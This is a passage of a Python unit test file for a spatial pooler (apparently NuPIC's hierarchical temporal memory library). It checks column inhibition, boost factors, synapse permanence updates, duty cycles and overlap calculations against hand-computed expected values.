# Test without wrapAround and potentialPct = 1
params["potentialPct"] = 1
sp = SpatialPooler(**params)
expectedMask = [1]
mask = sp._mapPotential(0, wrapAround=False)
self.assertListEqual(mask.tolist(), expectedMask)
def testInhibitColumns(self):
sp = self._sp
sp._inhibitColumnsGlobal = Mock(return_value = 1)
sp._inhibitColumnsLocal = Mock(return_value = 2)
randomState = getNumpyRandomGenerator()
sp._numColumns = 5
sp._inhibitionRadius = 10
sp._columnDimensions = [5]
overlaps = randomState.random_sample(sp._numColumns)
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numActiveColumnsPerInhArea = 5
sp._localAreaDensity = 0.1
sp._globalInhibition = True
sp._inhibitionRadius = 5
trueDensity = sp._localAreaDensity
sp._inhibitColumns(overlaps)
self.assertEqual(True, sp._inhibitColumnsGlobal.called)
self.assertEqual(False, sp._inhibitColumnsLocal.called)
density = sp._inhibitColumnsGlobal.call_args[0][1]
self.assertEqual(trueDensity, density)
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numColumns = 500
sp._tieBreaker = numpy.zeros(500)
sp._columnDimensions = numpy.array([50, 10])
sp._numActiveColumnsPerInhArea = -1
sp._localAreaDensity = 0.1
sp._globalInhibition = False
sp._inhibitionRadius = 7
# 0.1 * (2*9+1)**2 = 22.5
trueDensity = sp._localAreaDensity
overlaps = randomState.random_sample(sp._numColumns)
sp._inhibitColumns(overlaps)
self.assertEqual(False, sp._inhibitColumnsGlobal.called)
self.assertEqual(True, sp._inhibitColumnsLocal.called)
self.assertEqual(trueDensity, density)
# Test translation of numColumnsPerInhArea into local area density
sp._numColumns = 1000
sp._tieBreaker = numpy.zeros(1000)
sp._columnDimensions = numpy.array([100, 10])
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numActiveColumnsPerInhArea = 3
sp._localAreaDensity = -1
sp._globalInhibition = False
sp._inhibitionRadius = 4
trueDensity = 3.0/81.0
overlaps = randomState.random_sample(sp._numColumns)
# 3.0 / (((2*4) + 1) ** 2)
sp._inhibitColumns(overlaps)
self.assertEqual(False, sp._inhibitColumnsGlobal.called)
self.assertEqual(True, sp._inhibitColumnsLocal.called)
density = sp._inhibitColumnsLocal.call_args[0][1]
self.assertEqual(trueDensity, density)
# Test clipping of local area density to 0.5
sp._numColumns = 1000
sp._tieBreaker = numpy.zeros(1000)
sp._columnDimensions = numpy.array([100, 10])
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numActiveColumnsPerInhArea = 7
sp._localAreaDensity = -1
sp._globalInhibition = False
sp._inhibitionRadius = 1
trueDensity = 0.5
overlaps = randomState.random_sample(sp._numColumns)
sp._inhibitColumns(overlaps)
self.assertEqual(False, sp._inhibitColumnsGlobal.called)
self.assertEqual(True, sp._inhibitColumnsLocal.called)
density = sp._inhibitColumnsLocal.call_args[0][1]
self.assertEqual(trueDensity, density)
def testUpdateBoostFactors(self):
sp = self._sp
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.zeros(sp._numColumns) + 1e-6
sp._activeDutyCycles = numpy.array([0.1, 0.3, 0.02, 0.04, 0.7, 0.12])
sp._boostFactors = numpy.zeros(sp._numColumns)
trueBoostFactors = [1, 1, 1, 1, 1, 1]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertAlmostEqual(trueBoostFactors[i], sp._boostFactors[i])
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.array([0.1, 0.3, 0.02, 0.04, 0.7, 0.12])
sp._activeDutyCycles = numpy.array([0.1, 0.3, 0.02, 0.04, 0.7, 0.12])
trueBoostFactors = [1, 1, 1, 1, 1, 1]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertLessEqual(abs(trueBoostFactors[i] - sp._boostFactors[i]), 1e-6)
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.array([0.1, 0.2, 0.02, 0.03, 0.7, 0.12])
sp._activeDutyCycles = numpy.array([0.01, 0.02, 0.002, 0.003, 0.07, 0.012])
trueBoostFactors = [9.1, 9.1, 9.1, 9.1, 9.1, 9.1]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertLessEqual(abs(trueBoostFactors[i] - sp._boostFactors[i]), 1e-6)
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.array([0.1, 0.2, 0.02, 0.03, 0.7, 0.12])
sp._activeDutyCycles = numpy.zeros(sp._numColumns)
trueBoostFactors = 6*[sp._maxBoost]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertLessEqual(abs(trueBoostFactors[i] - sp._boostFactors[i]), 1e-6)
def testUpdateInhibitionRadius(self):
sp = self._sp
# Test global inhibition case
sp._globalInhibition = True
sp._columnDimensions = numpy.array([57, 31, 2])
sp._updateInhibitionRadius()
self.assertEqual(sp._inhibitionRadius, 57)
sp._globalInhibition = False
sp._avgConnectedSpanForColumnND = Mock(return_value = 3)
sp._avgColumnsPerInput = Mock(return_value = 4)
trueInhibitionRadius = 6
# ((3 * 4) - 1) / 2 => round up
sp._updateInhibitionRadius()
self.assertEqual(trueInhibitionRadius, sp._inhibitionRadius)
# Test clipping at 1.0
sp._globalInhibition = False
sp._avgConnectedSpanForColumnND = Mock(return_value = 0.5)
sp._avgColumnsPerInput = Mock(return_value = 1.2)
trueInhibitionRadius = 1
sp._updateInhibitionRadius()
self.assertEqual(trueInhibitionRadius, sp._inhibitionRadius)
# Test rounding up
sp._globalInhibition = False
sp._avgConnectedSpanForColumnND = Mock(return_value = 2.4)
sp._avgColumnsPerInput = Mock(return_value = 2)
trueInhibitionRadius = 2
# ((2 * 2.4) - 1) / 2.0 => round up
sp._updateInhibitionRadius()
self.assertEqual(trueInhibitionRadius, sp._inhibitionRadius)
def testAvgColumnsPerInput(self):
sp = self._sp
sp._columnDimensions = numpy.array([2, 2, 2, 2])
sp._inputDimensions = numpy.array([4, 4, 4, 4])
self.assertEqual(sp._avgColumnsPerInput(), 0.5)
sp._columnDimensions = numpy.array([2, 2, 2, 2])
sp._inputDimensions = numpy.array( [7, 5, 1, 3])
# 2/7 0.4 2 0.666
trueAvgColumnPerInput = (2.0/7 + 2.0/5 + 2.0/1 + 2/3.0) / 4
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([3, 3])
sp._inputDimensions = numpy.array( [3, 3])
# 1 1
trueAvgColumnPerInput = 1
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([25])
sp._inputDimensions = numpy.array( [5])
# 5
trueAvgColumnPerInput = 5
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([3, 3, 3, 5, 5, 6, 6])
sp._inputDimensions = numpy.array( [3, 3, 3, 5, 5, 6, 6])
# 1 1 1 1 1 1 1
trueAvgColumnPerInput = 1
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([3, 6, 9, 12])
sp._inputDimensions = numpy.array( [3, 3, 3 , 3])
# 1 2 3 4
trueAvgColumnPerInput = 2.5
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
def testAvgConnectedSpanForColumn1D(self):
sp = self._sp
sp._numColumns = 9
sp._columnDimensions = numpy.array([9])
sp._inputDimensions = numpy.array([12])
sp._connectedSynapses = (
BinaryCorticalColumns([[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1]]))
trueAvgConnectedSpan = [7, 5, 1, 5, 0, 2, 3, 3, 8]
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumn1D(i)
self.assertEqual(trueAvgConnectedSpan[i], connectedSpan)
def testAvgConnectedSpanForColumn2D(self):
sp = self._sp
sp._numColumns = 9
sp._columnDimensions = numpy.array([9])
sp._numInpts = 8
sp._inputDimensions = numpy.array([8])
sp._connectedSynapses = (
BinaryCorticalColumns([[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1]]))
trueAvgConnectedSpan = [7, 5, 1, 5, 0, 2, 3, 3, 8]
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumn1D(i)
self.assertEqual(trueAvgConnectedSpan[i], connectedSpan)
sp._numColumns = 7
sp._columnDimensions = numpy.array([7])
sp._numInputs = 20
sp._inputDimensions = numpy.array([5, 4])
sp._connectedSynapses = BinaryCorticalColumns(sp._numInputs)
sp._connectedSynapses.resize(sp._numColumns, sp._numInputs)
connected = numpy.array([
[[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]],
# rowspan = 3, colspan = 3, avg = 3
[[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]],
# rowspan = 2 colspan = 4, avg = 3
[[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]],
# row span = 5, colspan = 4, avg = 4.5
[[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 1, 0, 0]],
# rowspan = 5, colspan = 1, avg = 3
[[0, 0, 0, 0],
[1, 0, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]],
# rowspan = 1, colspan = 4, avg = 2.5
[[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]],
# rowspan = 2, colspan = 2, avg = 2
[[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
# rowspan = 0, colspan = 0, avg = 0
])
trueAvgConnectedSpan = [3, 3, 4.5, 3, 2.5, 2, 0]
for columnIndex in xrange(sp._numColumns):
sp._connectedSynapses.replace(
columnIndex, connected[columnIndex].reshape(-1).nonzero()[0]
)
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumn2D(i)
self.assertEqual(trueAvgConnectedSpan[i], connectedSpan)
def testAvgConnectedSpanForColumnND(self):
sp = self._sp
sp._inputDimensions = numpy.array([4, 4, 2, 5])
sp._numInputs = numpy.prod(sp._inputDimensions)
sp._numColumns = 5
sp._columnDimensions = numpy.array([5])
sp._connectedSynapses = BinaryCorticalColumns(sp._numInputs)
sp._connectedSynapses.resize(sp._numColumns, sp._numInputs)
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[1][0][1][0] = 1
connected[1][0][1][1] = 1
connected[3][2][1][0] = 1
connected[3][0][1][0] = 1
connected[1][0][1][3] = 1
connected[2][2][1][0] = 1
# span: 3 3 1 4, avg = 11/4
sp._connectedSynapses.replace(0, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[2][0][1][0] = 1
connected[2][0][0][0] = 1
connected[3][0][0][0] = 1
connected[3][0][1][0] = 1
# spn: 2 1 2 1, avg = 6/4
sp._connectedSynapses.replace(1, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[0][0][1][4] = 1
connected[0][0][0][3] = 1
connected[0][0][0][1] = 1
connected[1][0][0][2] = 1
connected[0][0][1][1] = 1
connected[3][3][1][1] = 1
# span: 4 4 2 4, avg = 14/4
sp._connectedSynapses.replace(2, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[3][3][1][4] = 1
connected[0][0][0][0] = 1
# span: 4 4 2 5, avg = 15/4
sp._connectedSynapses.replace(3, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
# span: 0 0 0 0, avg = 0
sp._connectedSynapses.replace(4, connected.reshape(-1).nonzero()[0])
trueAvgConnectedSpan = [11.0/4, 6.0/4, 14.0/4, 15.0/4, 0]
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumnND(i)
self.assertAlmostEqual(trueAvgConnectedSpan[i], connectedSpan)
def testBumpUpWeakColumns(self):
sp = SpatialPooler(inputDimensions=[8],
columnDimensions=[5])
sp._synPermBelowStimulusInc = 0.01
sp._synPermTrimThreshold = 0.05
sp._overlapDutyCycles = numpy.array([0, 0.009, 0.1, 0.001, 0.002])
sp._minOverlapDutyCycles = numpy.array(5*[0.01])
sp._potentialPools = BinaryCorticalColumns(
[[1, 1, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 1, 0, 1, 1, 1, 0],
[1, 1, 1, 0, 0, 0, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1]])
sp._permanences = CorticalColumns(
[[0.200, 0.120, 0.090, 0.040, 0.000, 0.000, 0.000, 0.000],
[0.150, 0.000, 0.000, 0.000, 0.180, 0.120, 0.000, 0.450],
[0.000, 0.000, 0.014, 0.000, 0.032, 0.044, 0.110, 0.000],
[0.041, 0.000, 0.000, 0.000, 0.000, 0.000, 0.178, 0.000],
[0.100, 0.738, 0.045, 0.002, 0.050, 0.008, 0.208, 0.034]])
truePermanences = [
[0.210, 0.130, 0.100, 0.000, 0.000, 0.000, 0.000, 0.000],
# Inc Inc Inc Trim - - - -
[0.160, 0.000, 0.000, 0.000, 0.190, 0.130, 0.000, 0.460],
# Inc - - - Inc Inc - Inc
[0.000, 0.000, 0.014, 0.000, 0.032, 0.044, 0.110, 0.000], #unchanged
# - - - - - - - -
[0.051, 0.000, 0.000, 0.000, 0.000, 0.000, 0.188, 0.000],
# Inc Trim Trim - - - Inc -
[0.110, 0.748, 0.055, 0.000, 0.060, 0.000, 0.218, 0.000]]
sp._bumpUpWeakColumns()
for i in xrange(sp._numColumns):
perm = list(sp._permanences.getRow(i))
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
def testUpdateMinDutyCycleLocal(self):
sp = self._sp
# Replace the get neighbors function with a mock to know exactly
# the neighbors of each column.
sp._numColumns = 5
sp._getNeighborsND = Mock(side_effect=[[0, 1, 2],
[1, 2, 3],
[2, 3, 4],
[0, 2, 4],
[0, 1, 3]])
sp._minPctOverlapDutyCycles = 0.04
sp._overlapDutyCycles = numpy.array([1.4, 0.5, 1.2, 0.8, 0.1])
trueMinOverlapDutyCycles = [0.04*1.4, 0.04*1.2, 0.04*1.2, 0.04*1.4,
0.04*1.4]
sp._minPctActiveDutyCycles = 0.02
sp._activeDutyCycles = numpy.array([0.4, 0.5, 0.2, 0.18, 0.1])
trueMinActiveDutyCycles = [0.02*0.5, 0.02*0.5, 0.02*0.2, 0.02*0.4,
0.02*0.5]
sp._minOverlapDutyCycles = numpy.zeros(sp._numColumns)
sp._minActiveDutyCycles = numpy.zeros(sp._numColumns)
sp._updateMinDutyCyclesLocal()
self.assertListEqual(trueMinOverlapDutyCycles,
list(sp._minOverlapDutyCycles))
self.assertListEqual(trueMinActiveDutyCycles, list(sp._minActiveDutyCycles))
sp._numColumns = 8
sp._getNeighborsND = Mock(side_effect= [[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 6, 7],
[0, 2, 4, 6],
[1, 6],
[3, 5, 7],
[1, 4, 5, 6],
[2, 3, 6, 7]])
sp._minPctOverlapDutyCycles = 0.01
sp._overlapDutyCycles = numpy.array(
[1.2, 2.7, 0.9, 1.1, 4.3, 7.1, 2.3, 0.0])
trueMinOverlapDutyCycles = [0.01*4.3, 0.01*7.1, 0.01*4.3, 0.01*4.3,
0.01*4.3, 0.01*7.1, 0.01*7.1, 0.01*2.3]
sp._minPctActiveDutyCycles = 0.03
sp._activeDutyCycles = numpy.array(
[0.14, 0.25, 0.125, 0.33, 0.27, 0.11, 0.76, 0.31])
trueMinActiveDutyCycles = [0.03*0.33, 0.03*0.33, 0.03*0.76, 0.03*0.76,
0.03*0.76, 0.03*0.33, 0.03*0.76, 0.03*0.76]
sp._minOverlapDutyCycles = numpy.zeros(sp._numColumns)
sp._minActiveDutyCycles = numpy.zeros(sp._numColumns)
sp._updateMinDutyCyclesLocal()
self.assertListEqual(trueMinOverlapDutyCycles,
list(sp._minOverlapDutyCycles))
self.assertListEqual(trueMinActiveDutyCycles, list(sp._minActiveDutyCycles))
def testUpdateMinDutyCyclesGlobal(self):
sp = self._sp
sp._minPctOverlapDutyCycles = 0.01
sp._minPctActiveDutyCycles = 0.02
sp._numColumns = 5
sp._overlapDutyCycles = numpy.array([0.06, 1, 3, 6, 0.5])
sp._activeDutyCycles = numpy.array([0.6, 0.07, 0.5, 0.4, 0.3])
sp._updateMinDutyCyclesGlobal()
trueMinActiveDutyCycles = sp._numColumns*[0.02*0.6]
trueMinOverlapDutyCycles = sp._numColumns*[0.01*6]
for i in xrange(sp._numColumns):
self.assertAlmostEqual(trueMinActiveDutyCycles[i],
sp._minActiveDutyCycles[i])
self.assertAlmostEqual(trueMinOverlapDutyCycles[i],
sp._minOverlapDutyCycles[i])
sp._minPctOverlapDutyCycles = 0.015
sp._minPctActiveDutyCycles = 0.03
sp._numColumns = 5
sp._overlapDutyCycles = numpy.array([0.86, 2.4, 0.03, 1.6, 1.5])
sp._activeDutyCycles = numpy.array([0.16, 0.007, 0.15, 0.54, 0.13])
sp._updateMinDutyCyclesGlobal()
trueMinOverlapDutyCycles = sp._numColumns*[0.015*2.4]
for i in xrange(sp._numColumns):
self.assertAlmostEqual(trueMinOverlapDutyCycles[i],
sp._minOverlapDutyCycles[i])
sp._minPctOverlapDutyCycles = 0.015
sp._minPctActiveDutyCycles= 0.03
sp._numColumns = 5
sp._overlapDutyCycles = numpy.zeros(5)
sp._activeDutyCycles = numpy.zeros(5)
sp._updateMinDutyCyclesGlobal()
trueMinOverlapDutyCycles = sp._numColumns * [0]
trueMinActiveDutyCycles = sp._numColumns * [0]
for i in xrange(sp._numColumns):
self.assertAlmostEqual(trueMinActiveDutyCycles[i],
sp._minActiveDutyCycles[i])
self.assertAlmostEqual(trueMinOverlapDutyCycles[i],
sp._minOverlapDutyCycles[i])
def testIsUpdateRound(self):
sp = self._sp
sp._updatePeriod = 50
sp._iterationNum = 1
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 39
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 50
self.assertEqual(sp._isUpdateRound(), True)
sp._iterationNum = 1009
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1250
self.assertEqual(sp._isUpdateRound(), True)
sp._updatePeriod = 125
sp._iterationNum = 0
self.assertEqual(sp._isUpdateRound(), True)
sp._iterationNum = 200
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 249
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1330
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1249
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1375
self.assertEqual(sp._isUpdateRound(), True)
def testAdaptSynapses(self):
sp = SpatialPooler(inputDimensions=[8],
columnDimensions=[4],
synPermInactiveDec=0.01,
synPermActiveInc=0.1)
sp._synPermTrimThreshold = 0.05
sp._potentialPools = BinaryCorticalColumns(
[[1, 1, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 1, 0, 0, 0, 1, 0],
[1, 0, 0, 0, 0, 0, 1, 0]])
inputVector = numpy.array([1, 0, 0, 1, 1, 0, 1, 0])
activeColumns = numpy.array([0, 1, 2])
sp._permanences = CorticalColumns(
[[0.200, 0.120, 0.090, 0.040, 0.000, 0.000, 0.000, 0.000],
[0.150, 0.000, 0.000, 0.000, 0.180, 0.120, 0.000, 0.450],
[0.000, 0.000, 0.014, 0.000, 0.000, 0.000, 0.110, 0.000],
[0.040, 0.000, 0.000, 0.000, 0.000, 0.000, 0.178, 0.000]])
truePermanences = [
[0.300, 0.110, 0.080, 0.140, 0.000, 0.000, 0.000, 0.000],
# Inc Dec Dec Inc - - - -
[0.250, 0.000, 0.000, 0.000, 0.280, 0.110, 0.000, 0.440],
# Inc - - - Inc Dec - Dec
[0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.210, 0.000],
# - - Trim - - - Inc -
[0.040, 0.000, 0.000, 0.000, 0.000, 0.000, 0.178, 0.000]]
# - - - - - - - -
sp._adaptSynapses(inputVector, activeColumns)
for i in xrange(sp._numColumns):
perm = list(sp._permanences.getRow(i))
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
sp._potentialPools = BinaryCorticalColumns(
[[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 1, 0]])
inputVector = numpy.array([1, 0, 0, 1, 1, 0, 1, 0])
activeColumns = numpy.array([0, 1, 2])
sp._permanences = CorticalColumns(
[[0.200, 0.120, 0.090, 0.000, 0.000, 0.000, 0.000, 0.000],
[0.000, 0.017, 0.232, 0.400, 0.000, 0.000, 0.000, 0.000],
[0.000, 0.000, 0.014, 0.051, 0.730, 0.000, 0.000, 0.000],
[0.170, 0.000, 0.000, 0.000, 0.000, 0.000, 0.380, 0.000]])
truePermanences = [
[0.30, 0.110, 0.080, 0.000, 0.000, 0.000, 0.000, 0.000],
# Inc Dec Dec - - - - -
[0.000, 0.000, 0.222, 0.500, 0.000, 0.000, 0.000, 0.000],
# - Trim Dec Inc - - - -
[0.000, 0.000, 0.000, 0.151, 0.830, 0.000, 0.000, 0.000],
# - - Trim Inc Inc - - -
[0.170, 0.000, 0.000, 0.000, 0.000, 0.000, 0.380, 0.000]]
# - - - - - - - -
sp._adaptSynapses(inputVector, activeColumns)
for i in xrange(sp._numColumns):
perm = list(sp._permanences.getRow(i))
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
def testRaisePermanenceThreshold(self):
sp = self._sp
sp._inputDimensions=numpy.array([5])
sp._columnDimensions=numpy.array([5])
sp._synPermConnected=0.1
sp._stimulusThreshold=3
sp._synPermBelowStimulusInc = 0.01
sp._permanences = CorticalColumns(
[[0.0, 0.11, 0.095, 0.092, 0.01],
[0.12, 0.15, 0.02, 0.12, 0.09],
[0.51, 0.081, 0.025, 0.089, 0.31],
[0.18, 0.0601, 0.11, 0.011, 0.03],
[0.011, 0.011, 0.011, 0.011, 0.011]])
sp._connectedSynapses = BinaryCorticalColumns([[0, 1, 0, 0, 0],
[1, 1, 0, 1, 0],
[1, 0, 0, 0, 1],
[1, 0, 1, 0, 0],
[0, 0, 0, 0, 0]])
sp._connectedCounts = numpy.array([1, 3, 2, 2, 0])
truePermanences = [
[0.01, 0.12, 0.105, 0.102, 0.02], # incremented once
[0.12, 0.15, 0.02, 0.12, 0.09], # no change
[0.53, 0.101, 0.045, 0.109, 0.33], # increment twice
[0.22, 0.1001, 0.15, 0.051, 0.07], # increment four times
[0.101, 0.101, 0.101, 0.101, 0.101]] #increment 9 times
maskPP = numpy.array(range(5))
for i in xrange(sp._numColumns):
perm = sp._permanences.getRow(i)
sp._raisePermanenceToThreshold(perm, maskPP)
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
def testUpdatePermanencesForColumn(self):
sp = SpatialPooler(inputDimensions=[5],
columnDimensions=[5],
synPermConnected=0.1)
sp._synPermTrimThreshold = 0.05
permanences = numpy.array([
[-0.10, 0.500, 0.400, 0.010, 0.020],
[0.300, 0.010, 0.020, 0.120, 0.090],
[0.070, 0.050, 1.030, 0.190, 0.060],
[0.180, 0.090, 0.110, 0.010, 0.030],
[0.200, 0.101, 0.050, -0.09, 1.100]])
# These are the 'true permanences' reflected in trueConnectedSynapses
# truePermanences = SparseMatrix(
# [[0.000, 0.500, 0.400, 0.000, 0.000],
# Clip - - Trim Trim
# [0.300, 0.000, 0.000, 0.120, 0.090],
# - Trim Trim - -
# [0.070, 0.050, 1.000, 0.190, 0.060],
# - - Clip - -
# [0.180, 0.090, 0.110, 0.000, 0.000],
# - - - Trim Trim
# [0.200, 0.101, 0.050, 0.000, 1.000]])
# - - - Clip Clip
trueConnectedSynapses = [
[0, 1, 1, 0, 0],
[1, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[1, 0, 1, 0, 0],
[1, 1, 0, 0, 1]]
trueConnectedCounts = [2, 2, 2, 2, 3]
for columnIndex in xrange(sp._numColumns):
sp._updatePermanencesForColumn(permanences[columnIndex], columnIndex)
self.assertListEqual(
trueConnectedSynapses[columnIndex],
list(sp._connectedSynapses[columnIndex])
)
self.assertListEqual(trueConnectedCounts, list(sp._connectedCounts))
def testCalculateOverlap(self):
"""
Test that column computes overlap and percent overlap correctly.
"""
sp = SpatialPooler(inputDimensions = [10],
columnDimensions = [5])
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]]))
sp._connectedCounts = numpy.array([10.0, 8.0, 6.0, 4.0, 2.0])
inputVector = numpy.zeros(sp._numInputs, dtype='float32')
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([0, 0, 0, 0, 0]))
trueOverlapsPct = list(numpy.array([0, 0, 0, 0, 0]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]]))
sp._connectedCounts = numpy.array([10.0, 8.0, 6.0, 4.0, 2.0])
inputVector = numpy.ones(sp._numInputs, dtype='float32')
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([10, 8, 6, 4, 2]))
trueOverlapsPct = list(numpy.array([1, 1, 1, 1, 1]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]]))
sp._connectedCounts = numpy.array([10.0, 8.0, 6.0, 4.0, 2.0])
inputVector = numpy.zeros(sp._numInputs, dtype='float32')
inputVector[9] = 1
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([1, 1, 1, 1, 1]))
trueOverlapsPct = list(numpy.array([0.1, 0.125, 1.0/6, 0.25, 0.5]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
# Zig-zag
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1]]))
sp._connectedCounts = numpy.array([2.0, 2.0, 2.0, 2.0, 2.0])
inputVector = numpy.zeros(sp._numInputs, dtype='float32')
inputVector[range(0, 10, 2)] = 1
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([1, 1, 1, 1, 1]))
trueOverlapsPct = list(numpy.array([0.5, 0.5, 0.5, 0.5, 0.5]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
def testInitPermanence1(self):
"""
test initial permanence generation. ensure that
a correct amount of synapses are initialized in
a connected state, with permanence values drawn from
the correct ranges
"""
sp = self._sp
sp._inputDimensions = numpy.array([10])
sp._numInputs = 10
sp._raisePermanenceToThreshold = Mock()
sp._potentialRadius = 2
connectedPct = 1
mask = numpy.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1])
perm = sp._initPermanence(mask, connectedPct)
connected = (perm >= sp._synPermConnected).astype(int)
